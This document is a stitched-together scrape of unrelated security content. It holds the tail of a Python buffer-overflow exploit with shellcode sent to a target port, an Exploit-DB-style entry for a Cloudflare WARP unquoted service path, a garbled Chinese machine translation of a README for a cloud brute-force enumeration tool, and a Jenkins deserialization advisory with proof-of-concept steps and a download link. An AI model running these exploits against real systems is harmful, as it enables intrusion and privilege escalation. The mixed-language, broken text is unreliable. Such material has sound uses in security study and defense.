payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)
# Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path
# Date: 05/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.cloudflare.com/
# Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/
# Version: 1.4.107
# Tested: Windows 10 Pro x64 es
C:\Users\Hejap>sc qc CloudflareWARP
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: CloudflareWARP
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Cloudflare WARP
DEPENDENCIES : wlansvc
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
在顶级云提供商(Amazon,Google,Microsoft,Digitalocean,Alibaba,Fultr,Linode)上查找公司(目标)基础架构,文件和应用程序的工具。结果对于虫子赏金猎人,红色团队者和穿透测试人员都有用。
完整的写入可用。这里
动机
我们一直在想一些可以自动化的东西,以使黑盒安全测试更加容易。我们讨论了创建一个多个平台云蛮力猎人的想法。要查找托管在云上的开放存储桶,应用程序和数据库,并可能在代理服务器后面进行应用程序。
这是我们尝试修复的先前方法的列表问题:
separate words lack of proper concurrency lack of supporting all major cloud providers require authentication or keys or cloud CLI access outdated endpoints and regions Incorrect file storage detection lack support for proxies (useful for bypassing region restrictions) lack support for user agent randomization (useful for bypassing rare restrictions) hard to use, poorly configured
功能
Cloud detection (IPINFO API and Source Code) Supports all major提供商Black-Box(未经身份验证)快速(并发)模块化且易于自定义的跨平台(Windows,Linux,Mac)用户代理随机化代理代理随机化(HTTP,Socks5)
支持的云提供商
-1010 Microsoft3:-存储- 应用程序- 应用程序- 应用
Amazon:-存储- 应用程序
Google:-存储- 应用程序
Digitalocean:-存储
fuvtr:-存储
Linode:-存储
Alibaba:-存储
版本
1.0.0
用法
只需下载用于操作系统的最新版本,然后遵循使用情况即可。
为了充分利用此工具,您必须了解如何正确配置它。当您打开下载版本时,有一个配置文件夹,其中有一个config.yaml文件。
看起来像这样
Providers: ['Amazon','Alibaba','Amazon',“ Microsoft”,“ Digitalocean”,“ Linode”,“ Linode”,“ fultr”,“ Google”]#支持提供者
Environments: ['test','dev','prod','stage','staging','bak']#用于突变
proxytype:'http'#socks5/http
ipinfo:''#ipinfo.io api键ipinfo api,您可以在ipinfo上注册并获取免费的键,该环境(用于生成URL的环境,例如test-keyword.target.target.region和test.keyword.target.target.region等,等等。
我们提供了一些单词列表,但是最好在执行工具之前自定义和最小化您的单词列表(基于您的侦察)。
设置API键后,您可以使用CloudBrute。
██████╗██╗██████╗██╗██╗██╗██████╗██████╗██╗██╗
██╔════╝██║██╔═════███║
██║██║██║██║██║██║██║██████╔╝██████╔╝██║██║█████╗
██║██║██║█████║████║████╔══███║██═══██║██║
╚██████╗███████╗╚██████╔╝╚██████╔╝██████╔╝██████╔╝██║██║╚██████╔╝██║
╚══════╚═══════╝╚════╝╚════╝╚════╝╚════╝╚═══╝
V 1.0.7
USAGE: CloudBrute [-h | -help] -d | - Domain'value'-k | -keyword'value'value'
-w | -wordList'value'[-c | -cloud'value'] [-t | -threads
整数] [-t | -pimeout Integer] [-p | -proxy'value']
[-a | -randomagent'value'] [-d | -debug] [-Q | - que]
[-m | - 模式'value'] [-o | -utput'value']
[-c | -configfolder'value']
很棒的云枚举
参数:
-h--螺旋打印帮助信息
-D-域域
-k - 用来生成URL的关键字
-w-文字列表列表路径
-c - 云强制搜索,检查config.yaml提供程序列表
-t-线程数的线程数。 Default: 80
-t-秒内每个请求的超时时间秒。 Default: 10
-P- Proxy使用代理列表
-a-随机用户代理随机化
-d-示例显示调试日志。 default: false
-Q- quite抑制所有输出。 default: false
-M-模式存储或应用。 Default:存储
-O-输出输出文件。 default: out.txt
-c - configfolder配置路径。 default: config例如
CloudBrute -d target.com -k target -M存储-M存储-T 80 -T 10 -W'./data/storage_small.txt'请注意- 用于生成URL的关键字,因此,如果您希望完整的域是突变的一部分,则您已将其用于域(-d)和键盘(-K)参数
如果未检测到云提供商或希望在特定提供商上搜索强制搜索,则可以使用-c选项。
CloudBrute -D Target.com -K关键字-M存储-M存储-T 80 -W 10 -W -C Amazon -o Target_output.txt
dev
克隆repo go build -o CloudBrute main.Go Go Go Internal
在动作中
3:010 3:010 3
如何贡献
添加一个模块或修复内容,然后拉动请求。与您认为可以使用它的人分享。做额外的工作,并与社区
常见问题
如何从此工具中发挥最佳作用?
分享您的发现。
我会出现错误;我该怎么办?
请确保正确阅读使用情况,如果您认为发现错误打开问题。
当我使用代理时,我会遇到太多错误,或者太慢?
这是因为您使用公共代理,请使用私人和更高质量的代理。您可以使用Proxyfor与所选的提供商一起验证良好的代理。
太快还是太慢?
更改-T(超时)选项,以获取最佳效果。
信用
灵感来自此处列出的每个回购。
Source: https://blogs.securiteam.com/index.php/archives/3171
Vulnerability Details
Jenkins is vulnerable to a Java deserialization vulnerability. In order to trigger the vulnerability two requests need to be sent.
The vulnerability can be found in the implementation of a bidirectional communication channel (over HTTP) which accepts commands.
The first request starts a session for the bi-directional channel and is used for “downloading” data from the server. The HTTP header “Session” is the identifier for the channel. The HTTP header “Side” specifies the “downloading/uploading” direction.
The second request is the sending component of the bidirectional channel. The first requests is blocked until the second request is sent. The request for a bidirectional channel is matched by the “Session” HTTP header which is just a UUID.
Proof of Concept
In order to exploit the vulnerability, an attacker needs to create a serialized payload with the command to execute by running the payload.jar script.
The second step is to change python script jenkins_poc1.py:
- Adjust target url in URL variable
- Change file to open in line “FILE_SER = open(“jenkins_poc1.ser”, “rb”).read()” to your payload file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41965.zip